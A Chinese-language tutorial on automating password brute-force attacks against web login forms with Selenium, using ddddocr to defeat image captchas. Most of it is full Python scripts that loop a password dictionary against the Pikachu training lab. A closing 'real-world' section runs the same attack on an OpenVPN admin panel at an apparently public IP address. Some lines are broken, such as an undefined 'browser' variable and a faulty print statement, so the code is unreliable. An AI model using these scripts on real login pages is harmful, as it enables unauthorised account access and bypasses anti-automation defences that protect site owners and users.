原文链接:利用Selenium绕过前端js加密及验证码爆破
Selenium&ddddocr识别验证码自动化爆破 Selenium是什么? Selenium可以模拟真实用户对URL中的元素进行操作。部分网站采用了一些流量校验算法,会将数据包中的进行加密,然后与计算出来的值进行比对,如果不能解密就加密的算法就很难使用burp爆破,及修改数据包的功能,而使用Selenium可以模拟人操作网站的行为,用户输入URL打开网站,选中输入框,输入内容,点击登录框。如果目标网站开启了一些校验,这些也会自动经过校验处理。而burp是直接跳过了这些操作,直接向服务器发送数据包。 前期准备 需要保证浏览器的大版本号,和浏览器的驱动程序匹配 • 下载Selenium支持的浏览器 • 下载Selenium浏览器驱动程序 安装Selenium py库 Selenium py库安装 pip3 install selenium 如何使用? 自己的默认浏览器的主版本号,需要与驱动的主版本号相同 经过上面的操作,下面需要测试python是否能够启动浏览器,能否加载浏览器驱动。可以使用下面的代码来进行测试 from selenium import webdriver driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe') #指定crome驱动位置 ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform() #防止浏览器退出 执行后成功弹出浏览器。 下面来了解一下Selenium的常见语法 常见语法 title = driver.title # 获取标题 driver.implicitly_wait(0.5) # 等待0.5秒 URL操作 driver.get() # 打开新网页 driver.refresh() # 刷新网页 查找元素 search_box = driver.find_element(by=By.NAME, value="q") # 通过NAME来寻找元素 search_button = driver.find_element(by=By.ID, value="btnK") # 通过ID来寻找元素 find_pass = driver.find_element(by=By.XPATH, value='//*[@id="app"]/div/div[1]/div[2]/div[1]/div/div[2]/input') # 通过XPATH的方式来寻找元素 操作元素 search_box.send_keys("Selenium") # 输入内容 search_button.click() # 点击按钮 SearchInput.clear() # 清除内容 获取元素信息 value = search_box.get_attribute("value") 结束会话 driver.quit() 大致流程 查找元素 -> 输入内容 -> 点击按钮 -> 获取返回的元素信息(判断是否登录成功) 打开网页 尝试让python程序打开一个网站。这里使用Pikachu的漏洞靶场来测试爆破功能 from selenium import webdriver def main(): driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe') #指定crome驱动位置 driver.get('http://192.168.180.152/06/vul/burteforce/bf_form.php')#打开指定URL ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform() if __name__ == "__main__": main() 元素选择 元素的选择支持ID,NAME,CSS,XPATH等方式,如果在一个DOM中出现两个相同名元素,默认会选择第一个元素。这里推荐使用Xpath的方式寻找路径。 find_login_box = driver.find_element(by=By.XPATH, value='') 账户输入框 通过查看页面,首先确定账户输入框的位置 获取Xpath 选择登录框元素 find_login_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[1]/span/input') 密码输入框 find_pass_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[2]/span/input') 输入内容 find_login_box.send_keys('admin') find_pass_box.send_keys('password') 运行后会自动打开网址,然后寻找元素,输入内容 点击操作 元素选择 首先选定Login按钮元素 find_button = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/div[2]/label/input') find_button.click() 运行python程序,会发现自动输入了账户密码,并点击了登录按钮。 完整代码 from time import sleep from selenium import webdriver from selenium.webdriver.common.by import By def main(): driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe') #指定crome驱动位置 driver.get('http://192.168.180.152/06/vul/burteforce/bf_form.php') find_login_box = driver.find_element(by=By.XPATH,value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[1]/span/input') find_pass_box = driver.find_element(by=By.XPATH,value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[2]/span/input') find_login_box.send_keys('admin') find_pass_box.send_keys('password') find_button = driver.find_element(by=By.XPATH,value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/div[2]/label/input') find_button.click() ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform() if __name__ == "__main__": main() 循环读取 接下来要实现的是循环读取字典中的账户密码,这里主要通过在寻找元素处建立循环。设置一个密码字典,让程序每次自动从python字典中取值。 打开文件 首先建立一个名为pass.txt的文档,其中放上一些密码‘ 使用python读取文档 read_passwords = open('pass.txt', 'r', encoding="utf-8") read_passwords.seek(0) 建立循环 这里建立循环使其查找元素,输入密码字典中的密码,登录,不断循环 for password in read_passwords: find_login_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[1]/span/input') find_pass_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[2]/span/input') find_button = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/div[2]/label/input') password = password.strip() find_login_box.send_keys('admin') find_pass_box.send_keys(password) sleep(1) find_button.click() 返回包判断 接下来需要对点击登录后,页面的响应进行判断,从而确定是否登录成功。 对是否登录成功,可以通过一些特定的标志,状态码,返回包,进行判断 loginYN = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/p').text if loginYN == "login success": print("爆破成功,密码为:"+ password) sleep(2) 运行后会自动进行输入,如果识别到特征会自动输出 完整代码 from time import sleep from selenium import webdriver from selenium.webdriver.common.by import By def login(): driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe') driver.get("http://192.168.124.148/test/vul/burteforce/bf_form.php") passwords = open('pass.txt','r',encoding="utf-8") passwords.seek(0) for password in passwords: find_login_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[1]/span/input') find_pass_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[2]/span/input') find_button = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/div[2]/label/input') password = password.strip() find_login_box.send_keys('admin') find_pass_box.send_keys(password) sleep(1) find_button.click() loginYN = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/p').text if loginYN == "login success": print("爆破成功,密码为:"+ password) sleep(2) #ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform() login() 利用ddddorc识别验证码爆破 首先使用官方给的语句,来对验证码进行判断。 逻辑 要实现验证码识别,首先需要将验证码保存,之后利用ddddorc进行识别。 对于动态验证码的保存可以使用selenium中的screenshot方法,网上也存在着通过xpath获取元素并存储图片的方法。 存储图片 find_capcha = driver.find_element(by=By.XPATH,value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[4]/img') find_capcha.screenshot("showvcode.png") 调用ddddorc识别 ocr = ddddocr.DdddOcr() with open("showvcode.png", 'rb') as f: image = f.read() res = ocr.classification(image) print(res) 完整代码 from time import sleep from selenium import webdriver from selenium.webdriver.common.by import By import ddddocr def main(): driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe') # 指定crome驱动位置 driver.get('http://192.168.180.152/06/vul/burteforce/bf_server.php') read_passwords = open('pass.txt', 'r', encoding="utf-8") read_passwords.seek(0) for password in read_passwords: find_login_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[1]/span/input') find_pass_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[2]/span/input') find_button = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/div[2]/label/input') find_capcha = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[4]/img') find_capcha_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[3]/span/input') find_capcha.screenshot("showvcode.png") ocr = ddddocr.DdddOcr() with open("showvcode.png", 'rb') as f: image = f.read() res = ocr.classification(image) print(res) password = password.strip() find_login_box.send_keys('admin') find_pass_box.send_keys(password) sleep(1) find_capcha_box.send_keys(res) sleep(3) find_button.click() loginYN = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/p').text if loginYN == "login success": print("爆破成功,密码为:" + password) sleep(2) ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform() if __name__ == "__main__": main() 演示 实战利用selenium爆破openvpn 判断是否登录成功 URL由https://xxx/admin/ 变为 https://xxx/admin/status_overview if driver.current_url == 'https://158.247.207.44/admin/status_overview': print("登录成功密码为:".password) 完整代码 from time import sleep from selenium import webdriver from selenium.webdriver.common.by import By def main(): options = webdriver.ChromeOptions() options.add_argument('ignore-certificate-errors') driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe', chrome_options=options) # 指定crome驱动位置 driver.get('https://158.247.207.44/admin/') read_passwords = open('pass.txt', 'r', encoding="utf-8") read_passwords.seek(0) for password in read_passwords: find_login_box = driver.find_element(by=By.XPATH, value='//*[@id="username"]') find_pass_box = driver.find_element(by=By.XPATH, value='//*[@id="password"]') find_button = driver.find_element(by=By.XPATH, value='//*[@id="submit-button"]') password = password.strip() find_login_box.send_keys('openvpn') find_pass_box.send_keys(password) sleep(1) find_button.click() if driver.current_url == 'https://158.247.207.44/admin/status_overview': print("登录成功密码为:" + password) ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform() if __name__ == "__main__": main() 演示 参考
| 
发表于 2022-11-8 21:16:13